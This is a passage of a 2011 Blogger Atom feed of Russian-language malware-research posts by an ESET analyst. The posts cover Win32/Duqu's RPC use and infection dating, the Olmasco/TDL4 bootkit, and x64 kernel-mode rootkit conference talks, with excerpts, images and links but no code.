Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-rbKFPMWqCPI/TsFBLQGvssI/AAAAAAAABAw/ppWKjssF4r8/s72-c/11081990.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1128923515973821943</id><published>2011-11-01T14:31:00.002+04:00</published><updated>2011-11-01T17:57:17.777+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Duqu'/><category scheme='http://www.blogger.com/atom/ns#' term='Antiforensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Win32/Duqu REsearch: что скрывает RPC</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Мы продолжаем &lt;a href="http://blog.eset.com/2011/10/28/win32duqu-analysis-the-rpc-edition"&gt;исследование&lt;/a&gt; Win32/Duqu, в этом посте поговорим об особенностях использования RPC-протокола. Во-первых, сразу хочу отметить,  что реализация RPC-протокола еще раз подтверждает сходство кода Duqu и Stuxnet. RPC-протокол, был одной из наиболее интересных частей Stuxnet. В Duqu используется, лишь часть от полного функционала этого протокола, который подробно описан в нашем исследовании &amp;quot;&lt;a href="http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf"&gt;Stuxnet under the Microscope&lt;/a&gt;&amp;quot; (стр. 56-57).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Проанализировав реализацию RPC-сервера в одном из компонентов Duqu, который реализует лишь локальную часть протокола и сравнив в BinDiff две основные процедуры, мы получили интересные результаты:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-qxW2_1CdUcI/Tq_DKqlFNzI/AAAAAAAAA_c/D1GqImzZuGQ/s1600/2_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="241" src="http://3.bp.blogspot.com/-qxW2_1CdUcI/Tq_DKqlFNzI/AAAAAAAAA_c/D1GqImzZuGQ/s320/2_1.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/11/win32duqu-research-rpc.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1128923515973821943?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1128923515973821943/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/11/win32duqu-research-rpc.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1128923515973821943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1128923515973821943'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/11/win32duqu-research-rpc.html' title='Win32/Duqu REsearch: что скрывает RPC'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-qxW2_1CdUcI/Tq_DKqlFNzI/AAAAAAAAA_c/D1GqImzZuGQ/s72-c/2_1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-465097719194221761</id><published>2011-10-26T23:15:00.001+04:00</published><updated>2011-10-26T23:51:16.570+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Duqu'/><category scheme='http://www.blogger.com/atom/ns#' term='Decompilation'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Python'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Как определить точную дату заражения Win32/Duqu</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;После того, как появилась первая информация о Win32/Duqu мы не могли пройти мимо, так как нам было очень интересно составить собственные впечатления об этой угрозе (да и challenge со Stuxnet напомнило). Начали копать, оказалось, что код Duqu имеет очень много общего со своим старшим братом Stuxnet. В процессе анализа складывается впечатление, что некоторые части просто полностью повторяют код из Win32/Stuxnet. Код драйверов практически идентичен, еще из наблюдений скорее всего для обоих разработок был использован какой то общий фреймворк для разработки всякого.&lt;br&gt;&lt;br&gt;С того момента, как мы начали исследовать Win32/Duqu, нас интересовал вопрос, каким образом можно идентифицировать точную дату заражения компьютера этой вредоносной программой (т.к. дроппер нам до сих пор найти не удалось). Такая информация, прежде всего, полезна для проведения криминалистической экспертизы и восстановления картины произошедших событий. У нас появилась идея о том, что если Duqu хранит информацию о моменте своего самоудаления, то должна быть информация, с которой начинается этот отсчет (варианта могло быть два, либо счетчик, либо дата заражения). Нам удалось обнаружить интересную вещь, на данный момент у нас есть несколько наборов сэмплов с различных зараженных машин. И оказалось, что в процессе заражения формируется так называемая main.dll, в которой сохраняется точная дата заражения в UTC-формате. Ниже мы приводим декомпилированный код, осуществляющий проверку этой самой даты:&lt;br&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-T2GwxURmAfU/TqhBjTUssYI/AAAAAAAAA-4/_RNRLrPjTMA/s1600/InfectionTime.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="204" src="http://1.bp.blogspot.com/-T2GwxURmAfU/TqhBjTUssYI/AAAAAAAAA-4/_RNRLrPjTMA/s320/InfectionTime.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/10/win32duqu.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-465097719194221761?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/465097719194221761/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/10/win32duqu.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/465097719194221761'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/465097719194221761'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/10/win32duqu.html' title='Как определить точную дату заражения Win32/Duqu'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-T2GwxURmAfU/TqhBjTUssYI/AAAAAAAAA-4/_RNRLrPjTMA/s72-c/InfectionTime.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4362482386778095243</id><published>2011-10-26T19:44:00.002+04:00</published><updated>2012-01-12T14:26:06.341+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='TDL3'/><category scheme='http://www.blogger.com/atom/ns#' term='Olmasco'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Antiforensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Win32/Olmasco: новый виток развития TDL4</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;На днях в нашем англоязычном блоге мы уже &lt;a href="http://blog.eset.com/2011/10/18/tdl4-rebooted"&gt;писали&lt;/a&gt; об изменениях, произошедших за последнее время с TDL4. Для того, чтобы не было кривотолков нашего исследования, а оно уже стало сумбурно цитироваться русскоязычными СМИ, немного проясню ситуацию. Итак, во второй половине сентября нам попался интересный сэмпл TDL4 (точнее сначала мы так думали), который не смог быть обработан нашим автоматическим трекером для этого буткита. Собственно именно этот факт и привлек наше пристальное внимание к нему, при более детальном анализе оказалось, что это не Win32/Olmarik, а его модификация Win32/Olmasco (также известная, как MaxxSS). Olmasco базируется на исходных кодах TDL3/TDL4 и разрабатывается/поддерживается совсем другой группой разработчиков (это отчетливо видно по модификациям внесенным в код). Первый сэмпл попавший в семейство Win32/Olmasco в наших базах был обнаружен аж в январе этого года (&lt;a href="http://www.eset.eu/podpora/aktualizacia-5779?lng=en"&gt;обновление&lt;/a&gt; антивирусных баз от 2011/01/11), до этого момента мы не выделяли эти модификации в отдельное семейство. Вначале Olmasco базировался на исходных кодах TDL3, но в сентябре ситуация изменилась и появилась модификация базирующаяся на исходных кодах TDL4. Первыми, кто заметил нестандартный TDL4, была компания Microsoft. Исследователи из MS &lt;a href="http://blogs.technet.com/b/mmpc/archive/2011/09/25/a-tale-of-grannies-chinese-herbs-tom-cruise-alureon-and-steganography.aspx"&gt;опубликовали&lt;/a&gt; интересную особенность нового Win32/Olmasco у себя в блоге. А точнее, новый буткит получил помимо новых возможностей дистрибуции по различным партнеркам, любопытный функционал получения резервных адресов командных центров. Эти адреса скачивались в виде изображений, которые использовались в роли стегано-контейнеров.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/10/win32olmasco-tdl4.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4362482386778095243?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4362482386778095243/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/10/win32olmasco-tdl4.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4362482386778095243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4362482386778095243'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/10/win32olmasco-tdl4.html' title='Win32/Olmasco: новый виток развития TDL4'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-KsmF4aKKR30/Tqglq2ZoyYI/AAAAAAAAA-g/ac076UEjtGA/s72-c/18.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2712967260035220512</id><published>2011-10-19T02:12:00.001+04:00</published><updated>2011-10-25T10:23:05.522+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Duqu'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Antiforensics'/><category scheme='http://www.blogger.com/atom/ns#' term='SCADA'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Cyberwar'/><title type='text'>Win32/Duqu: новый виток развития истории со Stuxnet</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Буквально несколько часов назад компания Symantec обнародовала довольно интересный исследовательский &lt;a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf"&gt;отчет&lt;/a&gt; &amp;quot;Duqu: the precursor to the next Stuxnet&amp;quot;. Собственно повествует он о вредоносной программе, которая своей реализацией сильно напоминает все известный Stuxnet. Причем настолько напоминает, что местами, кажется, что этот код писала одна и таже группа разработчиков. Сценарий работы очень схож со Stuxnet, но кода много и поэтому на 100% процентов для себя еще не подтвердил идентичность авторов. Из интересного вот такая вот сравнительная таблица:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-26NGN8ToiVY/Tp31PsylhUI/AAAAAAAAA98/-MbNt_IOKmU/s1600/table.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="319" src="http://1.bp.blogspot.com/-26NGN8ToiVY/Tp31PsylhUI/AAAAAAAAA98/-MbNt_IOKmU/s320/table.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/10/win32duqu-stuxnet.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2712967260035220512?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2712967260035220512/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/10/win32duqu-stuxnet.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2712967260035220512'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2712967260035220512'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/10/win32duqu-stuxnet.html' title='Win32/Duqu: новый виток развития истории со Stuxnet'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-26NGN8ToiVY/Tp31PsylhUI/AAAAAAAAA98/-MbNt_IOKmU/s72-c/table.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7629283011335129218</id><published>2011-10-12T14:19:00.000+04:00</published><updated>2011-10-12T14:20:47.942+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='VB'/><category scheme='http://www.blogger.com/atom/ns#' term='Rovnix'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Слайды нашего &lt;a href="http://www.virusbtn.com/conference/vb2011/abstracts/LastMinute1.xml"&gt;доклада&lt;/a&gt; с &lt;a href="http://www.virusbtn.com/conference/vb2011/programme/index"&gt;VB'2011&lt;/a&gt;:&lt;br /&gt;&lt;div&gt;&lt;div id="__ss_9656088" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/matrosov/modern-bootkit-trends-bypassing-kernelmode-signing-policy" target="_blank" title="Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy"&gt;&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/9656088" width="425"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;div style="padding-bottom: 12px; padding-left: 0px; padding-right: 0px; padding-top: 5px; text-align: justify;"&gt;Это немного урезанный вариант доклада с Ekoparty, плюс добавилось несколько новых слайдов в конце, о причинах работы этого вектора атак.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7629283011335129218?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7629283011335129218/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/10/modern-bootkit-trends-bypassing-kernel.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7629283011335129218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7629283011335129218'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/10/modern-bootkit-trends-bypassing-kernel.html' title='Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4436436408382915243</id><published>2011-10-07T19:44:00.000+04:00</published><updated>2011-10-11T13:53:57.035+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><category scheme='http://www.blogger.com/atom/ns#' term='Ekoparty'/><title type='text'>Впечатления от Ekoparty</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;В этом году конференция &lt;a href="http://ekoparty.org/eng/index.php"&gt;Ekoparty&lt;/a&gt; прошла уже в седьмой раз, если кто не знает эта самое главное мероприятие для  латинской Америки и традиционно оно проходит в славном городе Буэнос-Айрес. Мероприятие в первую очередь направленно на исследователей в области ИБ и содержит  большое количество хардкорных технических докладов.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-xg7LmNYMpSE/To7JoNvbQlI/AAAAAAAAA9A/eyfjQIJb58g/s1600/IMG_0418.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://2.bp.blogspot.com/-xg7LmNYMpSE/To7JoNvbQlI/AAAAAAAAA9A/eyfjQIJb58g/s320/IMG_0418.JPG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/10/ekoparty.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4436436408382915243?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4436436408382915243/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/10/ekoparty.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4436436408382915243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4436436408382915243'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/10/ekoparty.html' title='Впечатления от Ekoparty'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-xg7LmNYMpSE/To7JoNvbQlI/AAAAAAAAA9A/eyfjQIJb58g/s72-c/IMG_0418.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6633242127455605913</id><published>2011-09-26T16:37:00.000+04:00</published><updated>2011-10-12T14:20:30.514+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Rovnix'/><category scheme='http://www.blogger.com/atom/ns#' term='Ekoparty'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Defeating x64: Modern Trends of Kernel-Mode Rootkits</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div id="__ss_9416193" style="width: 425px;"&gt;Слайды нашей презентации на&amp;nbsp;&lt;a href="http://ekoparty.org/eng/2011/rodinov-matrosov.php"&gt;Ekoparty&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/matrosov/defeating-x64-modern-trends-of-kernelmode-rootkits" target="_blank"&gt;&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/9416193" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;&lt;br /&gt;&lt;div style="padding-bottom: 12px; padding-left: 0px; padding-right: 0px; padding-top: 5px; text-align: justify;"&gt;Это было незабываемо, одна из самых ярких конференций на которых мне доводилось побывать. Чуть позже подготовлю более детальный отчет с&amp;nbsp;эксклюзивными&amp;nbsp;фотками =)&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6633242127455605913?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6633242127455605913/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/09/defeating-x64-modern-trends-of-kernel.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6633242127455605913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6633242127455605913'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/09/defeating-x64-modern-trends-of-kernel.html' title='Defeating x64: Modern Trends of Kernel-Mode Rootkits'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-819174601771308775</id><published>2011-09-17T01:26:00.000+04:00</published><updated>2011-09-17T01:26:25.771+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='VB'/><category scheme='http://www.blogger.com/atom/ns#' term='Ekoparty'/><title type='text'>Ekoparty и VB2011</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-lnuJO8qpSDA/TnO0geXE1bI/AAAAAAAAA88/RC5YNI7szwM/s1600/VB2011-slide-new.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-lnuJO8qpSDA/TnO0geXE1bI/AAAAAAAAA88/RC5YNI7szwM/s1600/VB2011-slide-new.jpg" /&gt;&lt;/a&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-17xZV2CBy8M/TnO0OrWcmcI/AAAAAAAAA84/HdYm9lqGbv0/s1600/logo2011.png" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Достаточно&amp;nbsp;длительное время мы трудились над исследованием современных буткитов для x64 и прочих техник обхода проверок цифровой подписи для модулей ядра на 64-битных системах. В итоге результаты нашего исследования будут представлены сначала на &lt;a href="http://www.ekoparty.org/eng/2011/rodinov-matrosov.php"&gt;Ekoparty&lt;/a&gt; в Буэнос-Айресе в более хардкорном техническом варианте "Defeating x64: Modern Trends of Kernel-Mode Rootkits". А после этого на&amp;nbsp;&lt;a href="http://www.virusbtn.com/conference/vb2011/abstracts/LastMinute1.xml"&gt;VB2011&lt;/a&gt; в Барселоне уже в более концептуальном виде "Modern bootkit trends: bypassing kernel-mode signing policy", адаптированном для АВ-публики :)&lt;a href="http://draft.blogger.com/"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;В задачи подготовки этих выступлений входило не просто подготовить рассказ о современных техниках загрузки не подписанных модулей ядра на 64-битных системах, а рассказать о концептуальных&amp;nbsp;причинах, которые делают это возможным и почему MS не может выпустить волшебный патч. После конференций слайды обязательно положу здесь ;)&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-819174601771308775?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/819174601771308775/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/09/ekoparty-vb2011.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/819174601771308775'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/819174601771308775'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/09/ekoparty-vb2011.html' title='Ekoparty и VB2011'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' 